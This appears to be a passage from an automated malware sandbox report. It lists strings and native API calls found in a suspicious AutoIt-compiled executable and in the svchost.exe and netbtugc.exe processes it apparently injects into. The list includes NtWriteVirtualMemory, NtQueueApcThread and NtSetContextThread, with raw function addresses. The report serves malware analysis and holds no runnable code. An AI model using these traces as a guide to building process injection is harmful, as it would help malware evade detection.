            Source: opp46lGmxd.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_66686cff-3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A04340 NtSetContextThread,LdrInitializeThunk,4_2_03A04340
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A04650 NtSuspendThread,LdrInitializeThunk,4_2_03A04650
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03A02BA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03A02BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03A02BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02B60 NtClose,LdrInitializeThunk,4_2_03A02B60
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02AF0 NtWriteFile,LdrInitializeThunk,4_2_03A02AF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02AD0 NtReadFile,LdrInitializeThunk,4_2_03A02AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02FB0 NtResumeThread,LdrInitializeThunk,4_2_03A02FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02FE0 NtCreateFile,LdrInitializeThunk,4_2_03A02FE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02F30 NtCreateSection,LdrInitializeThunk,4_2_03A02F30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03A02E80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03A02EE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03A02DF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02DD0 NtDelayExecution,LdrInitializeThunk,4_2_03A02DD0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03A02D30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03A02D10
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03A02CA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02C60 NtCreateKey,LdrInitializeThunk,4_2_03A02C60
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03A02C70
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A035C0 NtCreateMutant,LdrInitializeThunk,4_2_03A035C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A039B0 NtGetContextThread,LdrInitializeThunk,4_2_03A039B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02B80 NtQueryInformationFile,4_2_03A02B80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02AB0 NtWaitForSingleObject,4_2_03A02AB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02FA0 NtQuerySection,4_2_03A02FA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02F90 NtProtectVirtualMemory,4_2_03A02F90
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02F60 NtCreateProcessEx,4_2_03A02F60
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02EA0 NtAdjustPrivilegesToken,4_2_03A02EA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02E30 NtWriteVirtualMemory,4_2_03A02E30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02DB0 NtEnumerateKey,4_2_03A02DB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02D00 NtSetInformationFile,4_2_03A02D00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02CF0 NtOpenProcess,4_2_03A02CF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02CC0 NtQueryVirtualMemory,4_2_03A02CC0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A02C00 NtQueryInformationProcess,4_2_03A02C00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A03090 NtSetValueKey,4_2_03A03090
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A03010 NtOpenDirectoryObject,4_2_03A03010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A03D10 NtOpenProcessToken,4_2_03A03D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A03D70 NtOpenThread,4_2_03A03D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7B50 NtDeleteFile,4_2_032B7B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7BE0 NtClose,4_2_032B7BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7A70 NtReadFile,4_2_032B7A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7920 NtCreateFile,4_2_032B7920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032B7D30 NtAllocateVirtualMemory,4_2_032B7D30
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00AC40B1
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00AB8858
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00AC545F
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A6E800 | 0_2_00A6E800
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A8DBB5 | 0_2_00A8DBB5
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A6E060 | 0_2_00A6E060
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AE804A | 0_2_00AE804A
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A74140 | 0_2_00A74140
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A82405 | 0_2_00A82405
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A96522 | 0_2_00A96522
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AE0665 | 0_2_00AE0665
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A9267E | 0_2_00A9267E
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A8283A | 0_2_00A8283A
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A76843 | 0_2_00A76843
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A989DF | 0_2_00A989DF
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A96A94 | 0_2_00A96A94
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AE0AE2 | 0_2_00AE0AE2
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A78A0E | 0_2_00A78A0E
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ABEB07 | 0_2_00ABEB07
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AC8B13 | 0_2_00AC8B13
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A8CD61 | 0_2_00A8CD61
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A97006 | 0_2_00A97006
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A73190 | 0_2_00A73190
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A7710E | 0_2_00A7710E
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A61287 | 0_2_00A61287
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A833C7 | 0_2_00A833C7
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A8F419 | 0_2_00A8F419
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A816C4 | 0_2_00A816C4
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A758C0 | 0_2_00A758C0
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A878D3 | 0_2_00A878D3
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A81BB8 | 0_2_00A81BB8
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A99D05 | 0_2_00A99D05
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A6FE40 | 0_2_00A6FE40
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A8BFE6 | 0_2_00A8BFE6
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A81FD0 | 0_2_00A81FD0
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_03D83640 | 0_2_03D83640
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416871 | 2_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416873 | 2_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004028A0 | 2_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410173 | 2_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401110 | 2_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E1F3 | 2_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401290 | 2_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403500 | 2_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040268A | 2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402698 | 2_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026A0 | 2_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF4A | 2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042D753 | 2_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF53 | 2_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C003E6 | 2_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 | 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA352 | 2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC02C0 | 2_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 | 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C001AA | 2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF81CC | 2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 | 2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30100 | 2_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC8158 | 2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 | 2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3C7C0 | 2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 | 2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B64750 | 2_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5C6E0 | 2_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C00591 | 2_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40535 | 2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEE4F6 | 2_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF2446 | 2_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF6BD7 | 2_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFAB40 | 2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3EA80 | 2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B429A0 | 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0A9A6 | 2_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 | 2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B268B8 | 2_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E8F0 | 2_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4A840 | 2_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B42840 | 2_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBEFA0 | 2_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4CFE0 | 2_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B32FC8 | 2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60F30 | 2_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B82F28 | 2_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB4F40 | 2_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52E90 | 2_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFCE93 | 2_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFEEDB | 2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFEE26 | 2_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40E59 | 2_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B58DBF | 2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3ADE0 | 2_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4AD00 | 2_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0CB5 | 2_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30CF2 | 2_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40C00 | 2_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B8739A | 2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF132D | 2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2D34C | 2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B452A0 | 2_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE12ED | 2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5B2C0 | 2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4B1B0 | 2_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0B16B | 2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2F172 | 2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7516C | 2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF70E9 | 2_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFF0E0 | 2_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEF0CC | 2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B470C0 | 2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFF7B0 | 2_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF16CC | 2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDD5B0 | 2_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF7571 | 2_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFF43F | 2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B31460 | 2_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5FB80 | 2_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB5BF0 | 2_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7DBF9 | 2_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFB76 | 2_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDDAAC | 2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B85AA0 | 2_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEDAC6 | 2_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB3A6C | 2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFA49 | 2_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF7A46 | 2_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD5910 | 2_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B49950 | 2_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5B950 | 2_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B438E0 | 2_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAD800 | 2_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFFB1 | 2_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B41F92 | 2_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFF09 | 2_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B49EB0 | 2_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5FDC0 | 2_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF7D73 | 2_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF1D5A | 2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B43D40 | 2_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFCF2 | 2_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB9C32 | 2_2_03BB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A903E6 | 4_2_03A903E6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039DE3F0 | 4_2_039DE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8A352 | 4_2_03A8A352
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A502C0 | 4_2_03A502C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A70274 | 4_2_03A70274
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A901AA | 4_2_03A901AA
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A841A2 | 4_2_03A841A2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A881CC | 4_2_03A881CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039C0100 | 4_2_039C0100
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A6A118 | 4_2_03A6A118
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A58158 | 4_2_03A58158
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A62000 | 4_2_03A62000
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039CC7C0 | 4_2_039CC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039F4750 | 4_2_039F4750
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D0770 | 4_2_039D0770
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039EC6E0 | 4_2_039EC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A90591 | 4_2_03A90591
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D0535 | 4_2_039D0535
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A7E4F6 | 4_2_03A7E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A74420 | 4_2_03A74420
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A82446 | 4_2_03A82446
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A86BD7 | 4_2_03A86BD7
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8AB40 | 4_2_03A8AB40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039CEA80 | 4_2_039CEA80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A9A9A6 | 4_2_03A9A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D29A0 | 4_2_039D29A0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039E6962 | 4_2_039E6962
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039B68B8 | 4_2_039B68B8
